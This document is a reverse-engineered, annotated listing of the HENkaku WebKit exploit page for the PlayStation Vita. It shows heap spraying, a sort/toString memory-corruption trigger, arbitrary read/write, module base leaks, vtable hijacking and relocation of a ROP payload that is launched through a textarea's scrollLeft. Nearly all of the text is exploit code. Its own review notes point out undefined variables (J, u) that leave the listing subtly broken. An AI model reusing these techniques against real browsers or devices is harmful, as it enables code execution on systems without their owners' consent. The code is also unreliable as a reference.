
Henkaku exploit - HTML reversed

  1. <script src='payload.js'></script>
  2.  
  3. <script>
// Scratch globals reused throughout the script. Assigned later in this
// listing: r, t, n, o, e, i, f, v, p, d, g, k, b. Declared but never assigned
// at top level here: a, l, s, c, u, y, w, h, A, U (a and r are also
// re-declared as locals inside z.toString).
// NOTE(review): u is read in the payload_addr computation below while still
// undefined — confirm against the original source.
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;

// payload is provided by payload.js (loaded above). The inline comment gives
// the intended result as 476 words; m itself is not referenced again in this
// listing — the relocation loop below compares against the literal 476.
var m = 0x40 + payload[16/4];  /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4;                /* 476 */

// Shared 16-byte DataView, created on first use by u2d()/d2u(). It is also
// used directly by the search loop further down (u2d is called during the
// W setup before that loop runs, so the view exists by then).
var _dview = null;

/*
    Pack two 32-bit words into one double: `hi` supplies the upper 32 bits,
    `low` the lower 32 bits. DataView defaults to big-endian, so the word
    written at byte offset 0 is the high half of the float read back at 0.
    Shares the lazily-created `_dview` with d2u().
*/
function u2d(low, hi)
{
  var view = _dview || (_dview = new DataView(new ArrayBuffer(16)));
  view.setUint32(0, hi);
  view.setUint32(4, low);
  return view.getFloat64(0);
}
  25.  
/*
    Split a double into its two 32-bit halves: {low, hi}. Inverse of u2d()
    and uses the same shared `_dview`, creating it on first call.
*/
function d2u(d)
{
  var view = _dview || (_dview = new DataView(new ArrayBuffer(16)));
  view.setFloat64(0, d);
  var hi = view.getUint32(0);
  var low = view.getUint32(4);
  return {low: low, hi: hi};
}
  37.  
// Scratch words overwritten by every swap() call; zero until then.
var word1 = 0;
var word2 = 0;

// 1024 x 32-bit buffer used by the "Save Element object" and
// "Restore Element object" loops further down.
var aspace_temp = new Uint32Array(1024);
  43.  
/*
    Read the two 32-bit words at byte `offset` in aspace32 (stored into the
    globals word1/word2 as a side effect) and combine them: from each word
    keep bits 0-11 and bits 16-19 (shifted down to 12-15), then pack the
    first 16-bit result low and the second high. Result is unsigned.
*/
function swap(offset)
{
  var idx = offset/4;
  word1 = aspace32[idx];
  word2 = aspace32[idx + 1];
  var loHalf = (word1 & 0xFFF | (word1 & 0xF0000) >> 4) & 0xFFFF;
  var hiHalf = (word2 & 0xFFF | (word2 & 0xF0000) >> 4) & 0xFFFF;
  return (loHalf | hiHalf << 16) >>> 0;
}
  50.  
// Spray parameters: r slots, t = byte length of each Uint32Array (0x1344),
// n = rows value written into every <textarea>, o = the value written over
// the rows word once it is located below.
// NOTE: textareas and aspace_arr are assigned without `var` (implicit globals).
r = 0x4000;
textareas = new Array(r);
aspace_arr = new Array(r);
t = 0x1344;
n = 0x66656463;
o = 0x55555555;


// Allocate one 0x1344-byte Uint32Array and one <textarea> per slot,
// alternating. The literals repeat t and n rather than reusing them;
// `var e` and `var i` re-declare the top-level vars.
for (var i = 0; i < aspace_arr.length; ++i)
{
  aspace_arr[i] = new Uint32Array(0x1344/4);
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas[i] = e;
}

/*
   Spray memory with Element objects
*/
// 1024 further textareas appended after the paired ones above.
for (var i = 0; i < 1024; ++i)
{
  var e = document.createElement("textarea");
  e.rows = 0x66656463;
  textareas.push(e);
}
  76.  
var N = 0x3000;
// A 0x3000-element array built through Array constructor .apply
// (N itself is not referenced again in this listing).
var W = Array.prototype.constructor.apply(null,new Array(0x3000));
var j = 2048;
// q has 2048 slots; the arrays built from it inside toString below are
// expected to have length j, which the search over C checks later.
var q = new Array(2048);
var z = {};

var C = new Array(256);

// Runs when W.sort() stringifies W[0] (z is stored there below): appends one
// element to W, then fills C with 256 arrays created from q with their first
// three slots set. Returns "" so the comparison sees an empty string.
z.toString = function()
             {
               W.push(12345);

               // `var r` here is a function-local that shadows the top-level r
               for (var r = 0; r < C.length; ++r)
               {
                 var a = Array.prototype.constructor.apply(null, q);
                 a[0] = 0;
                 a[1] = 1;
                 a[2] = 2;
                 C[r] = a;
               } return""
             };
  98.  
// z goes first so the default comparator calls z.toString() when it
// stringifies W[0]; every other filled slot holds the same double G.
W[0] = z;
// First call to u2d in the script; this also creates _dview.
var G = u2d(0x80000000, 0x80000000);

// Fills slots 1..8191; W was created with length 0x3000 (12288), so the
// remaining slots stay empty.
for (var i = 1; i < 8192; ++i)
  W[i] = G;

// No comparator: elements are converted to strings, which runs z.toString().
W.sort();
// Implicit globals; neither is referenced again in this listing.
contents = "";
cur = 0;

// Replace toString with a no-op so later stringification of z does nothing.
z.toString = function(){};

var I = null;

// Take the first array in C whose length no longer equals j (2048).
// I stays null if none differs; the loop below would then throw on I[count].
for (var i = 0; i < C.length; ++i)
{
  if(C[i].length != j)
  {
    I = C[i];
    break;
  }
}
  121.  
// Start index, far beyond the 2048 slots the arrays in C were created with.
var count = 0x20000000 - 0x11000;

// Walk downward from count until a non-zero slot is found whose upper
// 32 bits (DataView is big-endian, so getUint32(0) is the high half) equal
// t/4 (0x1344/4 = 0x4D1). The only exit is the break below.
// NOTE(review): the body reads and writes I[J], but J is never declared or
// assigned anywhere in this listing, so the first non-zero slot raises a
// ReferenceError as written — presumably the loop index was renamed when
// this was reversed; confirm against the original source.
for(; ; count--)
{
  if(I[count] != 0)
  {
    _dview.setFloat64(0, I[J]);

    if (_dview.getUint32(0) == t/4)
    {
      // Overwrite the high word of the matched double and store it back
      _dview.setUint32(0, 0xEFFFFFE0);

      I[J] = _dview.getFloat64(0);
      _dview.setFloat64(0, I[J - 2]);

      // Keep the low word of I[J-2]; it is reused below as fkvtable and f
      v = _dview.getUint32(4);
      _dview.setUint32(4, 0);
      _dview.setUint32(0, 0x80000000);

      I[J-2] = _dview.getFloat64(0);

      break;
    }
  }
}
  147.  
// Implicit global: the first sprayed Uint32Array whose byteLength no
// longer reports t (0x1344), or null if none does.
target_aspace = null;

for (var i = 0; i < aspace_arr.length; ++i)
{
  if(aspace_arr[i].byteLength != t)
  {
    target_aspace = aspace_arr[i];
    break;
  }
}

// Stop here when nothing changed; the busy-wait never returns.
if (!target_aspace)
{
  alert("failed");
  while(1){};
}

// aspace32 is the typed array every later read and write goes through
// (swap() above indexes it too). fkvtable and f both alias v from the
// search loop.
var aspace32 = target_aspace;
var fkvtable = v;
f = v;
  168.  
/*
   Find one of the sprayed Element objects in memory
   by looking for the rows of the object
*/

// Scan 0x4000 words from f/4 for the rows value n (0x66656463, written as a
// literal here) and overwrite the first hit with o (0x55555555).
// textarea_addr and found_element are implicit globals that only come into
// existence on a hit.
for (var addr = f/4; addr < f/4 + 0x4000; ++addr)
{
  if (aspace32[addr] == 0x66656463)
  {
    aspace32[addr] = 0x55555555;
    textarea_addr = addr * 4;
    found_element = true;
    break;
  }
}

// NOTE(review): found_element is never initialised to false (unlike
// found_corrupted below), so on a miss this read throws a ReferenceError
// instead of reaching the alert.
if (!found_element)
{
  alert("Did not find Element signature");
  while(1){};
}
  190.  
/*
   Change the rows of the Element object then scan the array of
   sprayed objects to find an object whose rows have been changed
*/

// Look for the element whose rows property now reads back as o
// (0x55555555) after the write above. Initialised explicitly so the
// check below cannot throw.
var found_corrupted = false;
var corrupted_textarea;

for (var i = 0; i < textareas.length; ++i)
{
  if(textareas[i].rows == 0x55555555)
  {
    corrupted_textarea = textareas[i];
    found_corrupted = true;
    break;
  }
}

if (!found_corrupted)
{
  alert("Did not find corrupted textarea");
  while(1){};
}
  214.  
// The word 0x70 bytes before the located rows word is treated as the
// element's vtable pointer.
var vtidx = textarea_addr - 0x70;
var textareavptr = aspace32[vtidx/4];
// Bases derived from that pointer. The deltas (0xABB65C, 0x85F504, 0xFA49,
// ...) are fixed constants of this listing; nothing on the page derives
// them, so they are presumably specific to one build. swap() decodes the
// two words at the given byte offset. scewkbase, scelibcbase, scekernbase
// and scenetbase are implicit globals; p, d, g, k, b are the single-letter
// vars declared at the top.
scewkbase = textareavptr - 0xABB65C;
scelibcbase = swap(scewkbase + 0x85F504) - 0xFA49;
scekernbase = swap(scewkbase + 0x85F464) - 0x9031;
p = swap(scewkbase + 0x85D2E4) - 0x22D65;
d = swap(p + 0x2C688C) - 0x9E5;
g = swap(d + 0x3BC4) - 0xDC2D;
scenetbase = swap(scewkbase + 0x85F414) - 0x23ED;
k = swap(g + 0x18BF4) - 0xD59;
b = swap(k + 0x9AB8) - 0x49CD;
  226.  
// Copy vtable
// 64 words from where textareavptr points are copied to fkvtable, and the
// element's vtable slot is then pointed at the copy.
for (var i = 0; i < 64; i++)
  aspace32[fkvtable/4 + i] = aspace32[textareavptr/4 + i];

aspace32[vtidx/4] = fkvtable;

// Save Element object
// Stash 0x30 words starting at vtidx in aspace_temp (1024 slots) so they
// can be put back after the call below.
for (var i = 0; i < 0x30; ++i)
  aspace_temp[i] = aspace32[vtidx/4 + i];

// Call setjmp
// Entry 0x4E of the copied table is replaced. Precedence: the addition is
// evaluated first, then `| 1` sets the low bit.
aspace32[fkvtable/4 + 0x4E] = scelibcbase + 0x14070|1;

// Undefine scrollLeft
// Property write on the DOM element; the same property is written again at
// the end of the script.
corrupted_textarea.scrollLeft = 0;

// Save payload address (jmp context)
// Words 8 and 9 of the saved region are combined. Precedence: `+` binds
// before `^`, and each `>>> 0` applies last within its parentheses.
// NOTE(review): u is declared at the top but never assigned in this
// listing, so `u + 0x317929` is NaN and `x ^ NaN` is just x — confirm what
// u was meant to hold.
payload_addr = (aspace32[vtidx/4 + 8] ^ (aspace32[vtidx/4 + 9] ^ u + 0x317929) >>> 0) >>> 0;
payload_addr -= 0xEF818;

// Restore Element object
for (var i = 0; i < 0x30; ++i)
  aspace32[vtidx/4 + i] = aspace_temp[i];

// Derived positions: stack region 0x40 bytes in (matching the 0x40-byte
// header mentioned at the top), code 0x10000 bytes in. payload_off is a
// word index into aspace32.
payload_stack = payload_addr + 0x40;
payload_code = payload_addr + 0x10000;
payload_off = payload_addr/4;
  254.  
// Build ROP payload
// payload and relocs come from payload.js; they are assumed to be parallel
// arrays of the same length — TODO confirm. relocs[i] selects which base is
// added to payload[i] before it is stored at payload_off (stores into a
// Uint32Array wrap modulo 2^32).
for (var i = 0; i < payload.length; ++i,++payload_off)
{
  // Reached the end of ROP header (first 0x770 bytes)
  // 476 words = 0x770 bytes. The top of the script computes m and annotates
  // it as 476, but the literal is used here. Remaining words go to
  // payload_code.
  if (i == 476)
    payload_off = payload_code/4;

  switch(relocs[i])
  {
    case 0:  // stored as-is
      aspace32[payload_off] = payload[i];
      break;
    case 1:  // relative to the stack region
      aspace32[payload_off] = payload[i] + payload_stack;
      break;
    case 2:
      aspace32[payload_off] = payload[i] + scewkbase;
      break;
    case 3:
      aspace32[payload_off] = payload[i] + scekernbase;
      break;
    case 4:
      aspace32[payload_off] = payload[i] + scelibcbase;
      break;
    case 5:
      aspace32[payload_off] = payload[i] + g;
      break;
    case 6:
      aspace32[payload_off] = payload[i] + scenetbase;
      break;
    case 7:
      aspace32[payload_off] = payload[i] + b;
      break;
    default:
      // Unknown relocation kind: reported, the word is left unwritten and
      // the loop carries on (the missing break is harmless as the last case).
      alert("wtf?");
      alert(i + " " + relocs[i])
   }
}
  293.  
// Trigger ROPchain
// Entry 0x4E of the copied table is replaced a second time, now with an
// address relative to scewkbase.
aspace32[fkvtable/4 + 0x4E] = scewkbase + 0x54C8;   /* LDM R1 gadget */

// Two words are placed 0x100 bytes past the copied table (slots 5 and 6);
// scrollLeft is then set to that address.
var rchainaddr = fkvtable + 0x100;

aspace32[rchainaddr/4 + 5] = payload_code;
aspace32[rchainaddr/4 + 6] = scewkbase + 0xC048A|1;

alert("Welcome to HENkaku!");

// Set scrollLeft to ROP chain
corrupted_textarea.scrollLeft = rchainaddr;

// Reached only if the property write above returns normally.
alert("that's it");
  308. </script>